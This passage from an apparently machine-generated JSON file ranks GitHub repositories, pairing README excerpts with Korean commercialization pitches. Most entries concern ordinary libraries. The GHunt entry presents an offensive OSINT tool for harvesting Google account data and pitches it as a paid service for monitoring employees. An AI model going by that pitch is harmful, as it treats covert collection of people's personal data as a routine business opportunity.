뱅킹 서비스**: 고객들이 계좌이체, 카드 결제 시 숫자를 정확히 입력하도록 자동 안내\n2. **예약 ","readme_excerpt":"# Inputmask\n\nCopyright (c) 2010 - 2023 Robin Herbots Licensed under the MIT license (<https://opensource.org/licenses/MIT>)\n\nThe Inputmask has a very permissive license and this will stay that way. But when you use the Inputmask in a commercial setting, be so honest to make a small donation.\nThis will be appreciated very much.\n\n[![donate](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=ZNR3EB6JTMMSS)\n\n![npm](https://img.shields.io/npm/v/inputmask) ![npm (tag)](https://img.shields.io/npm/v/inputmask/next) ![Libraries.io dependency status for latest release](https://img.shields.io/librariesio/release/npm/inputmask)\n\nInputmask is a javascript library that creates an input mask. Inputmask can run against vanilla javascript, jQuery, and jqlite.\n\nAn inputmask helps the user with the input by ensuring a predefined format. This can be useful for dates, numerics, phone numbers, ...\n\nThanks to [Browserstack](https","composite_score":0.0948,"license_safety_tag":"safe"},{"name":"org-roam/org-roam-ui","github_url":"https://github.com/org-roam/org-roam-ui","stars":7,"language":"TypeScript","license":"GPL-3.0","abandonment_months":5,"description":"# org-roam-ui 프로젝트 분석\n\n## 왜 보물인가\n노트 필기 앱의 복잡한 연결 관계를 시각화로 한눈에 보여주는 인터페이스로, 디지털 메모 정리에 혁신적인 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 개인용 지식관리 플랫폼**\n월 구독료를 받고 사용자들이 자신의 노트를 망처럼 연결하고 시각화할 수 있는 웹 서비스로 운영","readme_excerpt":"[![ci](https://github.com/org-roam/org-roam-ui/actions/workflows/ci.yml/badge.svg)](https://github.com/org-roam/org-roam-ui/actions/workflows/ci.yml) [![MELPA](https://melpa.org/packages/org-roam-ui-badge.svg)](https://melpa.org/#/org-roam-ui)\n<img width=\"1440\" alt=\"Screenshot 2021-10-12 at 12 51 39\" src=\"https://user-images.githubusercontent.com/21983833/136942774-3f293f65-dbd4-4479-b530-1fde738c5289.png\">\n\n# org-roam-ui: a graphical frontend for your org-roam Zettelkasten\n\n**Table of Contents**\n\n- [Changelog](#changelog)\n- [Installation](#installation)\n  - [Using package.el](#package.el)\n  - [Doom](#doom)\n  - [straight/use-package](#straightuse-package)\n- [Usage](#usage)\n- [Disclaimers ‼](#disclaimers-)\n- [FAQ 🗨](#faq-)\n- [Features ✨](#features-)\n  - [Planned features](#planned-features)\n- [Supporting org-roam-ui](#supporting-org-roam-ui)\n  - [Feedback](#feedback)\n  - [Contribute 💪](#contribute-)\n    - [Hacktoberfest](#hacktoberfest)\n  - [Donate](#donate)\n    - [Sponsors](#sponsors)\n","composite_score":0.0947,"license_safety_tag":"restricted"},{"name":"google-research/dex-lang","github_url":"https://github.com/google-research/dex-lang","stars":7,"language":"Haskell","license":"bsd-3-clause","abandonment_months":5,"description":"# Dex-Lang 상용화 분석\n\n## 왜 보물인가\n구글이 개발한 프로그래밍 언어로, 복잡한 데이터 처리를 누구나 쉽게 할 수 있도록 설계되어 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 SaaS**: 엑셀처럼 사용하는 데이터 분석 웹 서비스로 제공 (월 $29~199)\n2. **기업 자동화 도구**: 회계/인사팀의 반복적인 데이터 작업을 ","readme_excerpt":"# Dex [![Test status](https://github.com/google-research/dex-lang/workflows/Tests/badge.svg)](https://github.com/google-research/dex-lang/actions?query=workflow%3ATests)\nDex (named for \"index\") is a research language for typed, functional array\nprocessing. The goal of the project is to explore:\n\n  * Type systems for array programming\n  * Mathematical program transformations like differentiation and integration\n  * User-directed compilation to parallel hardware\n  * Interactive and incremental numerical programming and visualization\n\nTo learn more, check out our\n[paper](https://arxiv.org/abs/2104.05372),\nour [tutorial](https://google-research.github.io/dex-lang/examples/tutorial.html)\nor these example programs:\n\n  * [Dex prelude](https://google-research.github.io/dex-lang/lib/prelude.html)\n  * [Mandelbrot set](https://google-research.github.io/dex-lang/examples/mandelbrot.html)\n  * [Ray tracer](https://google-research.github.io/dex-lang/examples/raytrace.html)\n  * [Estimating pi](https:/","composite_score":0.0945,"license_safety_tag":"safe"},{"name":"luongvo209/Awesome-Linux-Software","github_url":"https://github.com/luongvo209/Awesome-Linux-Software","stars":5,"language":"HTML","license":"unknown","abandonment_months":1,"description":"# Awesome-Linux-Software 분석\n\n## 왜 보물인가\n리눅스 운영체제에서 사용할 수 있는 유용한 프로그램들을 한곳에 모아놓은 추천 목록으로, 컴퓨터 초보자도 어떤 프로그램을 설치하면 좋을지 쉽게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 교육용 플랫폼**: 직원들이 리눅스 환경에서 필요한 업무 도구를 빠르게 찾을 수 있는 가","readme_excerpt":"# Awesome Linux Software\n\n**Notice (May 2026): I'm archiving this repository.** After years of maintaining it, I've found it increasingly difficult to curate quality contributions — the repo has become a target for self-promotion rather than a genuinely useful resource. It's not an easy decision, but it's the right one for me. The content will remain available, and I hope the community continues to build on it through forks. To everyone who starred, forked, contributed, or simply used this repository over the years — thank you. This project started as a personal list for myself, and I never expected it to grow into something so many people found useful. Please visit maintained forks by core maintainers such as @[DimitrisPa](https://github.com/DimitrisPa), @[FabioLolix](https://github.com/FabioLolix) \n\n\n![Tux](img/tux.png)\n\n\n🐧 This repo is a collection of **AWESOME** Linux applications and tools for **any users/developers**.\n\n🐧 Feel free to **contribute** / **star** / **fork** / **pull ","composite_score":0.0944,"license_safety_tag":"unknown"},{"name":"LewisVo/Awesome-Linux-Software","github_url":"https://github.com/LewisVo/Awesome-Linux-Software","stars":5,"language":"HTML","license":"unknown","abandonment_months":1,"description":"# Awesome-Linux-Software 분석\n\n## 왜 보물인가\n리눅스 운영체제에서 사용할 수 있는 유용한 프로그램들을 한눈에 정리한 가이드로, 컴퓨터를 더 효율적으로 사용하고 싶은 사람들에게 길잡이 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 목록을 기반으로 '리눅스 초보자를 위한 추천 소프트웨어 구독 서비스'를 만들","readme_excerpt":"# Awesome Linux Software\n\n**Notice (May 2026): I'm archiving this repository.** After years of maintaining it, I've found it increasingly difficult to curate quality contributions — the repo has become a target for self-promotion rather than a genuinely useful resource. It's not an easy decision, but it's the right one for me. The content will remain available, and I hope the community continues to build on it through forks. To everyone who starred, forked, contributed, or simply used this repository over the years — thank you. This project started as a personal list for myself, and I never expected it to grow into something so many people found useful. Please visit maintained forks by core maintainers such as @[DimitrisPa](https://github.com/DimitrisPa), @[FabioLolix](https://github.com/FabioLolix) \n\n\n![Tux](img/tux.png)\n\n\n🐧 This repo is a collection of **AWESOME** Linux applications and tools for **any users/developers**.\n\n🐧 Feel free to **contribute** / **star** / **fork** / **pull ","composite_score":0.0944,"license_safety_tag":"unknown"},{"name":"agmmnn/awesome-blender","github_url":"https://github.com/agmmnn/awesome-blender","stars":6,"language":"","license":"CC0-1.0","abandonment_months":4,"description":"# awesome-blender 상용화 분석\n\n## 왜 보물인가\n3D 디자인 소프트웨어인 블렌더(Blender) 관련 최고의 리소스들을 한곳에 모아놓은 가이드북으로, 초보자부터 전문가까지 필요한 모든 학습 자료와 도구를 빠르게 찾을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **블렌더 학습 플랫폼 SaaS**: 초보자 맞춤 온라인 강좌와 커뮤니티를","readme_excerpt":"[![img](https://randomrepoimg.fly.dev/agmmnn/awesome-blender/imgs \"Awesome Blender, bg: @mantissa (randomrepoimg.fly.dev)\")](#table)\n\n<div align=\"center\">\n    <a href=\"#table\"><img alt=\"Awesome Blender\"\n            src=\"https://img.shields.io/badge/awesome-gray?logo=blender&style=flat-square\" /></a>\n    <a href=\"https://discord.com/invite/blender\"><img alt=\"discord\"\n            src=\"https://img.shields.io/badge/discord-blender-blue?logo=discord&style=flat-square\" /></a>\n    <a href=\"#Contributing-\"><img alt=\"Contributions are Welcome\"\n            src=\"https://img.shields.io/badge/keep-up--to--date-blue?logo=&style=flat-square\" /></a>\n    <a href=\"https://awesome-blender.netlify.app/\"><img\n            src=\"https://api.netlify.com/api/v1/badges/0fe6c176-6b03-4d27-a8fc-faf4f7c460cd/deploy-status\" /></a>\n    <p>A curated list of awesome <b>Blender</b> add-ons, tools, tutorials and resources for 3D Artists, Hobbyists,\n        Developers, Researchers. Focused <i>mostly</i> open source and fr","composite_score":0.0943,"license_safety_tag":"unknown"},{"name":"Team-Tea-Time/laravel-forum","github_url":"https://github.com/Team-Tea-Time/laravel-forum","stars":12,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Laravel Forum - 상용화 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 커뮤니티 사이트를 만들 수 있는 기반 기술로, 별도의 복잡한 개발 없이 포럼 기능을 갖춘 웹사이트를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 화이트레이블 포럼 플랫폼**\n- 중소 기업/커뮤니티가 구독료를 내고 자신의 브랜드로 포럼을 운영하","readme_excerpt":"![Tests](https://github.com/Team-Tea-Time/laravel-forum/actions/workflows/tests.yml/badge.svg) ![phpcs](https://github.com/Team-Tea-Time/laravel-forum/actions/workflows/phpcs.yml/badge.svg) ![Packagist Downloads](https://img.shields.io/packagist/dm/riari/laravel-forum) ![Packagist License](https://img.shields.io/packagist/l/riari/laravel-forum)\n\n![Laravel Forum Logo](./logo.png)\n\n**Complete documentation is available on [teamteatime.net](https://www.teamteatime.net/).**\n\n## Versions\n\n| **Laravel version** | **Livewire version \\*** | **Package version** | **PHP version** |\n|---------------------|-------------------------|---------------------|-----------------|\n| 13                  | 4                       | ^8.0                | ^8.3            |\n| 12                  | 3                       | ^7.0                | ^8.2            |\n\n_* Only applicable if you intend to use a Livewire-based UI preset._\n\nPlease note that older package versions not listed above are no longer maintaine","composite_score":0.0942,"license_safety_tag":"safe"},{"name":"tgriesser/knex","github_url":"https://github.com/tgriesser/knex","stars":9,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Knex 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 데이터를 저장하고 관리하는 작업을 간단하게 해주는 널리 사용되는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 정보 관리 시스템에서 사용자 데이터를 효율적으로 저장·조회하는 백엔드 기술\n2. **내부 업무 도구**: 기업의 직원 관리, 프로젝트 추적, 재고 시스템 등","readme_excerpt":"# [knex.js](https://knex.github.io/documentation/)\n\n[![npm version](http://img.shields.io/npm/v/knex.svg)](https://npmjs.org/package/knex)\n[![npm downloads](https://img.shields.io/npm/dm/knex.svg)](https://npmjs.org/package/knex)\n![](https://github.com/knex/knex/workflows/CI/badge.svg)\n[![codecov](https://codecov.io/gh/knex/knex/graph/badge.svg?token=bH39w8lIA9)](https://codecov.io/gh/knex/knex)\n[![Dependencies Status](https://img.shields.io/librariesio/github/knex/knex)](https://libraries.io/npm/knex)\n[![Gitter chat](https://badges.gitter.im/tgriesser/knex.svg)](https://gitter.im/tgriesser/knex)\n\n> **A SQL query builder that is _flexible_, _portable_, and _fun_ to use!**\n\nA batteries-included, multi-dialect (PostgreSQL, MariaDB, MySQL, CockroachDB, MSSQL, SQLite3, Oracle (including Oracle Wallet Authentication)) query builder for\nNode.js, featuring:\n\n- [transactions](https://knexjs.org/guide/transactions.html)\n- [connection pooling](https://knexjs.org/guide/#pool)\n- [streaming queries","composite_score":0.094,"license_safety_tag":"safe"},{"name":"pomber/didact","github_url":"https://github.com/pomber/didact","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":4,"description":"# pomber/didact 분석\n\n## 왜 보물인가\nReact 같은 복잡한 웹 기술을 매우 간단하게 만들어서, 누구나 쉽게 웹사이트를 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 코딩 없이 웹앱을 만드는 로우코드 플랫폼으로 판매 (노션, 버블 같은 경쟁)\n2. **내부 업무 도구**: 기업의 HR팀이나 마케팅","readme_excerpt":"<p align=\"center\"><img src=\"https://cloud.githubusercontent.com/assets/1911623/26426031/5176c348-40ad-11e7-9f1a-1e2f8840b562.jpeg\"></p>\n\n# Didact\n\n#### A DIY guide to build your own React\n\nThis repository goes together with a [series of posts](https://medium.com/hexacta-engineering/didact-learning-how-react-works-by-building-it-from-scratch-51007984e5c5) that explains how to build React from scratch step by step. **You can jump straight to [the last post](https://pomb.us/build-your-own-react) which is self-contained and includes everything.**\n\n| Blog Post                                                                                                                                       |                         Code sample                          |                                                                                                                                    Commits                                                                                                     ","composite_score":0.0939,"license_safety_tag":"unknown"},{"name":"facebookresearch/SlowFast","github_url":"https://github.com/facebookresearch/SlowFast","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":2,"description":"# SlowFast 저장소 분석\n\n## 왜 보물인가\n동영상 속 물체의 빠르고 느린 움직임을 동시에 인식하는 AI 기술로, 스포츠·보안·의료 등 다양한 산업에서 영상 분석의 정확도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스포츠 분석 SaaS 서비스**\n- 축구·야구 경기 영상을 자동으로 분석해 선수 동작 평가 및 전술 분석 리포","readme_excerpt":"# PySlowFast\n\nPySlowFast is an open source video understanding codebase from FAIR that provides state-of-the-art video classification models with efficient training. This repository includes implementations of the following methods:\n\n- [SlowFast Networks for Video Recognition](https://arxiv.org/abs/1812.03982)\n- [Non-local Neural Networks](https://arxiv.org/abs/1711.07971)\n- [A Multigrid Method for Efficiently Training Video Models](https://arxiv.org/abs/1912.00998)\n- [X3D: Progressive Network Expansion for Efficient Video Recognition](https://arxiv.org/abs/2004.04730)\n- [Multiscale Vision Transformers](https://arxiv.org/abs/2104.11227)\n- [A Large-Scale Study on Unsupervised Spatiotemporal Representation Learning](https://arxiv.org/abs/2104.14558)\n- [MViTv2: Improved Multiscale Vision Transformers for Classification and Detection](https://arxiv.org/abs/2112.01526)\n- [Masked Feature Prediction for Self-Supervised Visual Pre-Training](https://arxiv.org/abs/2112.09133)\n- [Masked Autoencod","composite_score":0.0939,"license_safety_tag":"safe"},{"name":"greensock/GreenSock-JS","github_url":"https://github.com/greensock/GreenSock-JS","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":1,"description":"# GreenSock-JS 분석 보고서\n\n## 왜 보물인가\n웹사이트의 움직이는 애니메이션을 쉽게 만들 수 있는 도구로, 전 세계 수백만 개의 웹사이트에서 사용되는 업계 표준입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 애니메이션 기능이 포함된 SaaS 서비스**\n웹 디자인 도구, 프레젠테이션 소프트웨어, 온라인 광고 플랫폼 등에서 부드러운 애니메이션 효과를","readme_excerpt":"# GSAP (GreenSock Animation Platform)\n\n[![GSAP - Animate anything](https://gsap.com/GSAP-share-image.png)](https://gsap.com)\n\nGSAP is a **framework-agnostic** JavaScript animation library that turns developers into animation superheroes. Build high-performance animations that work in **every** major browser. Animate CSS, SVG, canvas, React, Vue, WebGL, colors, strings, motion paths, generic objects... anything JavaScript can touch! GSAP's <a href=\"https://gsap.com/docs/v3/Plugins/ScrollTrigger/\">ScrollTrigger</a> plugin delivers jaw-dropping scroll-based animations with minimal code. <a href=\"https://gsap.com/docs/v3/GSAP/gsap.matchMedia()\">gsap.matchMedia()</a> makes building responsive, accessibility-friendly animations a breeze.\n\nNo other library delivers such advanced sequencing, reliability, and tight control while solving real-world problems on over 12 million sites. GSAP works around countless browser inconsistencies; your animations ***just work***. At its core, GSAP is a high-","composite_score":0.0938,"license_safety_tag":"unknown"},{"name":"CocoaLumberjack/CocoaLumberjack","github_url":"https://github.com/CocoaLumberjack/CocoaLumberjack","stars":6,"language":"Objective-C","license":"bsd-3-clause","abandonment_months":0,"description":"# CocoaLumberjack 상업화 분석\n\n## 왜 보물인가\n스마트폰 앱이 제대로 작동하는지 추적하는 일을 자동화해주는 도구로, 앱 개발사들이 사용자 문제를 빠르게 발견하고 해결할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱 개발사들을 위한 \"앱 건강 모니터링 대시보드\" 구독 서비스\n- **내부 업무 도구**: 대","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/CocoaLumberjack/CocoaLumberjack/master/LumberjackLogo.png\" title=\"Lumberjack logo\" float=left>\n</p>\n\nCocoaLumberjack\n===============\n[![Version](https://img.shields.io/github/release/CocoaLumberjack/CocoaLumberjack.svg?display_name=tag&style=flat)](https://github.com/CocoaLumberjack/CocoaLumberjack/releases/latest)\n[![License](https://img.shields.io/github/license/CocoaLumberjack/CocoaLumberjack.svg?style=flat)](https://opensource.org/licenses/BSD-3-Clause)\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FCocoaLumberjack%2FCocoaLumberjack%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex.com/CocoaLumberjack/CocoaLumberjack)\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FCocoaLumberjack%2FCocoaLumberjack%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/CocoaLumberjack/CocoaLumberjack)\n[![Carthage compatible](","composite_score":0.0936,"license_safety_tag":"safe"},{"name":"sachinchoolur/lightGallery","github_url":"https://github.com/sachinchoolur/lightGallery","stars":6,"language":"TypeScript","license":"NOASSERTION","abandonment_months":2,"description":"# lightGallery 저장소 분석\n\n## 왜 보물인가\n웹사이트에 사진을 멋지게 보여주는 갤러리 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사진 공유 플랫폼(포트폴리오 사이트, 웨딩 사진첩 공유 서비스)에 내장하여 사진 전시 기능 제공\n2. **내부 업무 도구**: 디자인 에이전시나 부동산 중개업소","readme_excerpt":"![commit](https://badgen.net/github/last-commit/sachinchoolur/lightGallery/master)\n![npm](https://img.shields.io/npm/v/lightgallery.svg?color=red)\n![npm-tag](https://badgen.net/github/tag/sachinchoolur/lightgallery)\n![size](https://badgen.net/bundlephobia/minzip/lightgallery?color=cyan)\n![tree-shaking](https://badgen.net/bundlephobia/tree-shaking/lightgallery?color=purple)\n![types](https://badgen.net/npm/types/lightgallery?color=blue)\n![hits](https://badgen.net/jsdelivr/hits/npm/lightgallery?color=pink)\n\n# lightGallery\n\nA customizable, modular, responsive, lightbox gallery plugin. No dependencies.\\\\\nAvailable for React.js, Angular, Vue.js, and typescript.\n\n![lightgallery](https://www.lightgalleryjs.com/lightgallery-demo.png)\n\n## Core features\n\n-   Fully responsive.\n-   Modular architecture with built in plugins.\n-   Highly optimized for touch devices.\n-   Mouse drag supports for desktops.\n-   Double-click/Double-tap to see actual size of the image.\n-   Animated thumbnails.\n-   Social s","composite_score":0.0935,"license_safety_tag":"unknown"},{"name":"holynova/gushi_namer","github_url":"https://github.com/holynova/gushi_namer","stars":8,"language":"TypeScript","license":"unknown","abandonment_months":4,"description":"# gushi_namer 보물 분석\n\n## 왜 보물인가\n중국 고전 문학에서 영감을 받아 독특한 이름을 자동으로 만들어주는 도구로, 창의적인 작명이 필요한 게임·브랜드·콘텐츠 제작에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 게임사의 캐릭터 작명 SaaS**: 게임사들이 대량의 NPC나 아이템 이름을 자동 생성하기 위해 월정액으로 구독\n*","readme_excerpt":"# 你的名字-用诗经, 楚辞, 唐诗,宋词起名字\n\n## slogan\n翻阅经典, 与一个好名字不期而遇\n\n## demo\n- [http://xiaosang.net/gushi_namer/](http://xiaosang.net/gushi_namer/), 支持手机查看\n- [https://holynova.github.io/gushi_namer/](https://holynova.github.io/gushi_namer/), 支持手机查看\n\n## 截图预览\n<div align=\"center\">\n  <img src=\"main.png\" width=\"200\" />\n  <img src=\"bookmark.png\" width=\"200\" />\n</div>\n\n## 支持的经典\n1. 诗经\n1. 楚辞\n1. 唐诗\n1. 宋词\n1. 乐府诗集\n1. 古诗三百首\n1. 著名辞赋\n\n## 作者的话\n我是作者holy_nova, 这个5年前的项目, 最近获得了颇多关注, 感谢大家的star.\n\n这个项目出发点, 是基于这样一个简单的理念: **词库好, 名字就好, 即使是随机取的**.  \n\n> 我叫周星驰, 取自滕王阁序\"雄州雾列, 俊采星驰\". \n\n这是我这个项目期望达到的效果. \n\n常说\"男诗经, 女楚辞\", 我爬取了中华传统经典的唐诗宋词等, 作为孕育好名字的优秀文本.\n\n这个项目没有任何人工智能, 没有判断名字价值的目标函数(5年前做这个项目时候, 人工智能还不像现在这么火). \n\n既然是随机, 就有可能带来一些智障, 搞笑的名字, 反过来惊艳, 惊鸿一瞥的名字也在随机中孕育\n\n让这个程序帮你翻阅经典, 与一个好名字不期而遇\n\n2021年09月04日\n\n## QA\n1. 为什么会有很多搞笑的名字? \n> 因为是随机生成的, 自由组合\n2. 为什么会有脏字?\n> 我已经加了一些脏字的简单过滤, 但试验下来, 发现古诗文里面脏字实在太多, 人工是过滤不完的.有兴许的源码里面搜索\"狗\", 找到敏感词列表, 自己扩展\n3. 为什么只有2个字的名字, 能否更改字数? \n> 这是一个简单的参数问题, 改起来很简单. 我这里采取了2个字名字, 因为1个字的话, 跟诗文没有什么关系, 这个字可以取自任何地方. \"三分诗, 七分读\", 3个字的话, 人","composite_score":0.0934,"license_safety_tag":"unknown"},{"name":"sdc-alibaba/SUI-Mobile","github_url":"https://github.com/sdc-alibaba/SUI-Mobile","stars":13,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# SUI-Mobile 보물 분석 보고서\n\n## 왜 보물인가\n스마트폰에서 쉽게 쓸 수 있는 사용자 인터페이스(UI) 디자인 키트로, 앱 개발자들이 버튼·메뉴·입력창 같은 기본 요소들을 빠르게 만들 수 있게 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 SaaS 서비스**\n기업들이 낮은 비용으로 스마트폰 앱을 만들 수 있는 웹 기반 ","readme_excerpt":"# SUI Mobile(MSUI)\n\n## 轻量的UI库\n\n[SUI Mobile](http://m.sui.taobao.org/) 是阿里巴巴国际UED前端团队出品的移动端  __UI库__。\n\n没有重复造轮子。主要借鉴 __Framework7__ 的形态并以此为基础，参考Ratchet、Ionic、Onsen各种不同的思路，强化功能，精简体积，并提供国内最稳定快速的CDN支持。此外还定制增强了一些工具类开源库。\n\n它的特点是非常轻量，并且能很好兼容 iOS 6.0+ 和 Android 4.0+  的设备。\n\n更多信息请前往 [官网](http://m.sui.taobao.org/)\n\n## 问题反馈\n\n首先在[官网FAQ页](http://m.sui.taobao.org/faq/)看下常见疑问里有没有你的问题。     \n其次在[issue](https://github.com/sdc-alibaba/SUI-Mobile/issues)里搜索一下你的问题关键字，可能之前已经有人遇到并解决了，可以节省大量时间精力。\n\n明确的问题更__推荐__直接提[issue反馈](https://github.com/sdc-alibaba/SUI-Mobile/issues)。\n\n也可以在旺旺群 1278550944 交流\n\n### Issue 注意\n\n考虑到移动端的特性，请一定写明 __系统、机型、浏览器的型号和版本__\n\n## Pull Request\n\n强烈欢迎大家提交PR一起完善，共建社区。简明开发文档在 [develop.md](https://github.com/sdc-alibaba/SUI-Mobile/blob/dev/develop.md)\n","composite_score":0.0933,"license_safety_tag":"safe"},{"name":"UrloMythus/UnHided","github_url":"https://github.com/UrloMythus/UnHided","stars":48,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0932,"license_safety_tag":"unknown"},{"name":"LocalIdentity/PathOfBuilding","github_url":"https://github.com/LocalIdentity/PathOfBuilding","stars":6,"language":"Lua","license":"NOASSERTION","abandonment_months":0,"description":"# LocalIdentity/PathOfBuilding 상품화 분석\n\n## 왜 보물인가\n게임 캐릭터 빌드를 자동으로 계획하고 최적화해주는 도구로, 복잡한 게임 시스템을 단순하게 만들어 누구나 강한 캐릭터를 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 공략 SaaS**: 월 구독 모델로 Path of Exile 플레이어를 위한 클라우드 ","readme_excerpt":"# Path of Building Community\n## Welcome to Path of Building, an offline build planner for Path of Exile!\n\n<p float=\"middle\">\n  <img alt=\"Tree tab\" src=\"https://github.com/user-attachments/assets/0826b7ab-84ba-440f-be52-2f216f13e75c\" width=\"48%\" />\n  <img alt=\"Items tab\" src=\"https://github.com/user-attachments/assets/e5af1326-7e22-43d8-ab12-aa5500da611a\" width=\"48%\" />\n</p>\n\n### Features\n* Comprehensive offence + defence calculations:\n  * Calculate your skill DPS, damage over time, life/mana/ES totals and much more!\n  * Can factor in auras, buffs, charges, curses, monster resistances and more, to estimate your effective DPS\n  * Also calculates life/mana reservations\n  * Shows a summary of character stats in the side bar, as well as a detailed calculations breakdown tab which can show you how the stats were derived\n  * Supports all skills and support gems, and most passives and item modifiers\n    * Throughout the program, supported modifiers will show in blue and unsupported ones in red","composite_score":0.0928,"license_safety_tag":"unknown"},{"name":"IBM/causallib","github_url":"https://github.com/IBM/causallib","stars":10,"language":"Python","license":"Apache-2.0","abandonment_months":1,"description":"# IBM/causallib 상용화 분석\n\n## 왜 보물인가\n인공지능이 내린 결정의 이유를 명확하게 설명할 수 있는 기술로, 의료·금융·법률 등 신뢰가 중요한 산업에서 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **은행/보험사 대출심사 SaaS**: \"왜 당신의 대출이 거절되었나\"를 명확하게 고객에게 설명하는 웹 서비스\n2. **의료기관 진단 ","readme_excerpt":"[![CI Status](https://github.com/BiomedSciAI/causallib/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/BiomedSciAI/causallib/actions/workflows/build.yml)\n[![Code Climate coverage](https://img.shields.io/codeclimate/coverage/BiomedSciAI/causallib?logo=codeclimate)](https://codeclimate.com/github/BiomedSciAI/causallib/test_coverage)\n[![PyPI](https://img.shields.io/pypi/v/causallib?color=blue&logo=pypi&logoColor=yellow)](https://badge.fury.io/py/causallib)\n[![Documentation Status](https://readthedocs.org/projects/causallib/badge/?version=latest)](https://causallib.readthedocs.io/en/latest/)\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/BiomedSciAI/causallib/HEAD)\n[![Slack channel](https://img.shields.io/badge/join-slack-blue.svg?logo=slack)](https://join.slack.com/t/causallib/shared_invite/zt-mwxnwe1t-htEgAXr3j3T2UeZj61gP6g)\n[![Slack channel](https://img.shields.io/badge/support-slack-blue.svg?logo=slack)](https://causallib.slack.com/","composite_score":0.0922,"license_safety_tag":"safe"},{"name":"TommyLemon/APIJSON","github_url":"https://github.com/TommyLemon/APIJSON","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# APIJSON 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터 요청을 간단한 형식으로 처리할 수 있어서, 앱이나 웹사이트 개발 시간을 획기적으로 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 IT회사가 자신들의 데이터 요청 시스템을 이 오픈소스로 구축하여 개발 비용 절감\n- **내부 업무 도구**: 회사의 데이터 관리","readme_excerpt":"Tencent is pleased to support the open source community by making APIJSON available.   <br/>\nCopyright (C) 2020 Tencent.  All rights reserved. <br/>\nThis source code is licensed under the Apache License Version 2.0 <br/>\n\n<h1 align=\"center\" style=\"text-align:center;\">\n  APIJSON\n</h1>\n\n\n<p align=\"center\">🏆 Real-Time no-code, powerful and secure ORM 🚀 <br />providing APIs and Docs without coding by Backend, and Frontend can customize response JSONs</p>\n\n<p align=\"center\" >\n  <a href=\"https://github.com/Tencent/APIJSON/blob/master/README-Chinese.md\">&nbsp;中文版&nbsp;</a>\n  <a href=\"https://github.com/Tencent/APIJSON/blob/master/Document.md\">&nbsp;Document&nbsp;</a>\n  <a href=\"https://search.bilibili.com/all?keyword=APIJSON\">&nbsp;Video&nbsp;</a>\n  <a href=\"http://apijson.cn/api\">&nbsp;Test&nbsp;</a>\n  <a href=\"https://deepwiki.com/Tencent/APIJSON\">Ask AI</a>\n</p>\n\n<p align=\"center\" >\n  <a href=\"https://github.com/APIJSON/APIJSON-Demo/tree/master/MySQL\"><img src=\"https://img.shields.io/badge","composite_score":0.0918,"license_safety_tag":"safe"},{"name":"mxrch/GHunt","github_url":"https://github.com/mxrch/GHunt","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":2,"description":"# GHunt 상용화 분석\n\n## 왜 보물인가\n구글 계정 정보를 효율적으로 수집하고 분석할 수 있는 도구로, 보안 감시, 신원 확인, 정보 조사가 필요한 조직에 매력적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 감시 SaaS**\n- 직원 신원 확인이나 사기 적발용 B2B 보안 서비스로 패키징 가능\n- 클라우드 기반 대시보드로 제공하여 구독 수익","readme_excerpt":"![](assets/long_banner.png)\n\n<br>\n\n#### 🌐 GHunt Online version : https://osint.industries\n#### 🐍 Now Python 3.13 compatible !\n\n<br>\n\n![Python minimum version](https://img.shields.io/badge/Python-3.10%2B-brightgreen)\n\n# 😊 Description\n\nGHunt (v2) is an offensive Google framework, designed to evolve efficiently.\\\nIt's currently focused on OSINT, but any use related with Google is possible.\n\nFeatures :\n- CLI usage and modules\n- Python library usage\n- Fully async\n- JSON export\n- Browser extension to ease login\n\n# ✔️ Requirements\n- Python >= 3.10\n\n# ⚙️ Installation\n\n```bash\n$ pip3 install pipx\n$ pipx ensurepath\n$ pipx install ghunt\n```\nIt will automatically use venvs to avoid dependency conflicts with other projects.\n\n# 💃 Usage\n\n## Login\n\nFirst, launch the listener by doing `ghunt login` and choose between 1 of the 2 first methods 